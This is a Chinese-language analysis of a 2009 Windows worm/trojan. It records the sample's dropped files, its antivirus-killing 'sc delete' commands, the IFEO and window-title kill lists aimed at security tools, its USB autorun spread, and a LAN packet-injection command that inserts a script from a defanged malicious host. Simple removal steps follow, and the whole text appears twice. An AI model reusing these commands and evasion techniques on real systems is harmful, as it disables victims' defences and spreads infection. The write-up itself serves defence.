這病毒很不簡單,比之07年橫行的AV終結者有過之而無不及。一般中這病毒只有等死了(截斷一切的防護措施),甚至下載的惡意程序還使用了Rootkit技術....
分析如下:
***連接的下載地址hxxp://a.wuc9.com/ab.css,改爲EXE後爲可執行
文件名稱:GRIL.PIF\ab.css(exe)
文件大小:30208 bytes
病毒命名:
Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb
BitDefender 7.2 2009.04.18 Genrojan.Heur.1024456363
Symantec 1.4.4.12 2009.04.19 Trojan.KillAV
加殼方式:PE_Patch.UPX
文件MD5:cbda45b0fd2a779dddbd8a4807a6be6c
行爲:
1、啓動時查找互斥體“AS21a669aSSE”,有則退出進程,防止多個病毒體被運行
2、釋放文件:
C:\WINDOWS\Fonts\svchost.exe 11776 字節
C:\WINDOWS\Fonts\wuauclt.exe 20480 字節
C:\WINDOWS\system32\36osafe.exe, 13531 字節
C:\WINDOWS\system32\isb.ini = 141 字節 (病毒下載列表)
C:\WINDOWS\system32\LINKINFO.dll(主體)
3、調用cmd /c sc delete avp命令,刪除卡巴斯基服務
4、連接網絡:[url]http://a.wuc9.com/tt.txt[/url]保存至C:\WINDOWS\system32\isb.ini,下載其他流氓程序!
5、修改IFEO,啓動重定向劫持,屏蔽常見的安全工具
360rpt.EXE
360safe.EXE
360safebox.EXE
360tray.EXE
ANTIARP.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
AvMonitor.EXE
AVP.COM
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
Mmsk.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
WOPTILITIES.EXE
5、查找窗口,發現以下文字則會被關閉:
essact
egui
RavTray
ccApp
vptray
KavStart
360Safebox
360Safetray
AfxControlBar42s
IceSword
SYSTEM
殺毒
清理
SREng
超級巡警
金山
Anti
Mcafee
狙劍
主動防禦
微點
綠鷹
主動
上報
舉報
瑞星
NOD32
攔截
監控
安全衛士
監視
冰刃的關閉方式是向退出時的確認框發送“是”消息,關閉冰刃。
6、查找可用的磁盤,在目錄下拷貝病毒爲autorun.inf和GRIL.PIF
並每隔一段時間查找可用磁盤,完成移動盤感染
所以重做系統,如果不及時刪除磁盤下的病毒副本,那麼病毒會死灰復燃!!!
7、時隔5秒爲週期,以遞增方式訪問192.168.0.1至192.168.0.100IP段,應該是局域傳播
由於測試侷限性,該行爲未實現。
8、調用CMD,刪除服務:
cmd.exe /c sc delete ekrn
cmd.exe /c sc delete RsRavMon
cmd.exe /c sc delete RavTask
cmd.exe /c sc delete RsScanSrv
cmd.exe /c sc delete RavCCenter
重啓後諾頓和瑞星報銷
9、還有這些服務也會被禁用:
Norton AntiVirus Server
McAfee Framework
Symantec AntiVirus Definition Watcher
Symantec AntiVirus Drivers Services
Norton AntiVirus
norton AntiVirus server
Kingsoft Internet Security Common Service
10、啓動另一個線程:C:\WINDOWS\system32\36osafe.exe(注意是36O不是360)
在192.168.203.2-192.168.203.254的數據包內加入一個框架,參數爲:
-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert "<script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js></script>"
完成局域感染
解密後hxxp://360.cdd1.com/lg.js
相繼連接以下站點:
hxxp://371gw.com/pai/ll.htm
hxxp://371gw.com/pai/4.htm
hxxp://371gw.com/pai/1.js
hxxp://371gw.com/pai/all.js
hxxp://371gw.com/pai/1.htm
hxxp://371gw.com/pai/ie.swf
hxxp://371gw.com/pai/all.htm
hxxp://371gw.com/pai/ll.htm
跟上次掛的馬基本一樣,猜臆爲同一網馬生成器
均爲crypthtml和unescape、shellcode混合加密
還是Real,Flash,Ms0614等漏洞
最後下載的病毒跟這個一樣!
11、刪除以下註冊表鍵值破壞安全模式:
SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
12、修改註冊表:
SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall
使隱藏文件不顯示,保護病毒文件
簡單的解決方法:
1、下載SREng,刪除啓動:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<360safe><C:\WINDOWS\Fonts\wuauclt.exe> []
SREng能檢測到的所有IFEO鍵值
[lfdl / lfdl][Stopped/Manual Start]
<\??\C:\WINDOWS\fonts\lfdl.sys><N/A>
[nbkkt / nbkkt][Stopped/Manual Start]
<\??\C:\WINDOWS\Fonts\nbkkt.fon><N/A>
[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>
pnpmem驅動
2、重啓計算機,刪除文件:
C:\WINDOWS\Fonts\svchost.exe 11776 字節
C:\WINDOWS\Fonts\wuauclt.exe 20480 字節
C:\WINDOWS\system32\36osafe.exe, 13531 字節
C:\WINDOWS\system32\LINKINFO.dll
3、全部刪除後解決,電腦可正常使用!
![]()
![]()
![]()
![]()
分析如下:
***連接的下載地址hxxp://a.wuc9.com/ab.css,改爲EXE後爲可執行
文件名稱:GRIL.PIF\ab.css(exe)
文件大小:30208 bytes
病毒命名:
Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb
BitDefender 7.2 2009.04.18 Genrojan.Heur.1024456363
Symantec 1.4.4.12 2009.04.19 Trojan.KillAV
加殼方式:PE_Patch.UPX
文件MD5:cbda45b0fd2a779dddbd8a4807a6be6c
行爲:
1、啓動時查找互斥體“AS21a669aSSE”,有則退出進程,防止多個病毒體被運行
2、釋放文件:
C:\WINDOWS\Fonts\svchost.exe 11776 字節
C:\WINDOWS\Fonts\wuauclt.exe 20480 字節
C:\WINDOWS\system32\36osafe.exe, 13531 字節
C:\WINDOWS\system32\isb.ini = 141 字節 (病毒下載列表)
C:\WINDOWS\system32\LINKINFO.dll(主體)
3、調用cmd /c sc delete avp命令,刪除卡巴斯基服務
4、連接網絡:[url]http://a.wuc9.com/tt.txt[/url]保存至C:\WINDOWS\system32\isb.ini,下載其他流氓程序!
5、修改IFEO,啓動重定向劫持,屏蔽常見的安全工具
360rpt.EXE
360safe.EXE
360safebox.EXE
360tray.EXE
ANTIARP.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
AvMonitor.EXE
AVP.COM
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
Mmsk.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
WOPTILITIES.EXE
5、查找窗口,發現以下文字則會被關閉:
essact
egui
RavTray
ccApp
vptray
KavStart
360Safebox
360Safetray
AfxControlBar42s
IceSword
SYSTEM
殺毒
清理
SREng
超級巡警
金山
Anti
Mcafee
狙劍
主動防禦
微點
綠鷹
主動
上報
舉報
瑞星
NOD32
攔截
監控
安全衛士
監視
冰刃的關閉方式是向退出時的確認框發送“是”消息,關閉冰刃。
6、查找可用的磁盤,在目錄下拷貝病毒爲autorun.inf和GRIL.PIF
並每隔一段時間查找可用磁盤,完成移動盤感染
所以重做系統,如果不及時刪除磁盤下的病毒副本,那麼病毒會死灰復燃!!!
7、時隔5秒爲週期,以遞增方式訪問192.168.0.1至192.168.0.100IP段,應該是局域傳播
由於測試侷限性,該行爲未實現。
8、調用CMD,刪除服務:
cmd.exe /c sc delete ekrn
cmd.exe /c sc delete RsRavMon
cmd.exe /c sc delete RavTask
cmd.exe /c sc delete RsScanSrv
cmd.exe /c sc delete RavCCenter
重啓後諾頓和瑞星報銷
9、還有這些服務也會被禁用:
Norton AntiVirus Server
McAfee Framework
Symantec AntiVirus Definition Watcher
Symantec AntiVirus Drivers Services
Norton AntiVirus
norton AntiVirus server
Kingsoft Internet Security Common Service
10、啓動另一個線程:C:\WINDOWS\system32\36osafe.exe(注意是36O不是360)
在192.168.203.2-192.168.203.254的數據包內加入一個框架,參數爲:
-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert "<script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js></script>"
完成局域感染
解密後hxxp://360.cdd1.com/lg.js
相繼連接以下站點:
hxxp://371gw.com/pai/ll.htm
hxxp://371gw.com/pai/4.htm
hxxp://371gw.com/pai/1.js
hxxp://371gw.com/pai/all.js
hxxp://371gw.com/pai/1.htm
hxxp://371gw.com/pai/ie.swf
hxxp://371gw.com/pai/all.htm
hxxp://371gw.com/pai/ll.htm
跟上次掛的馬基本一樣,猜臆爲同一網馬生成器
均爲crypthtml和unescape、shellcode混合加密
還是Real,Flash,Ms0614等漏洞
最後下載的病毒跟這個一樣!
11、刪除以下註冊表鍵值破壞安全模式:
SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
12、修改註冊表:
SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall
使隱藏文件不顯示,保護病毒文件
簡單的解決方法:
1、下載SREng,刪除啓動:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<360safe><C:\WINDOWS\Fonts\wuauclt.exe> []
SREng能檢測到的所有IFEO鍵值
[lfdl / lfdl][Stopped/Manual Start]
<\??\C:\WINDOWS\fonts\lfdl.sys><N/A>
[nbkkt / nbkkt][Stopped/Manual Start]
<\??\C:\WINDOWS\Fonts\nbkkt.fon><N/A>
[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>
pnpmem驅動
2、重啓計算機,刪除文件:
C:\WINDOWS\Fonts\svchost.exe 11776 字節
C:\WINDOWS\Fonts\wuauclt.exe 20480 字節
C:\WINDOWS\system32\36osafe.exe, 13531 字節
C:\WINDOWS\system32\LINKINFO.dll
3、全部刪除後解決,電腦可正常使用!
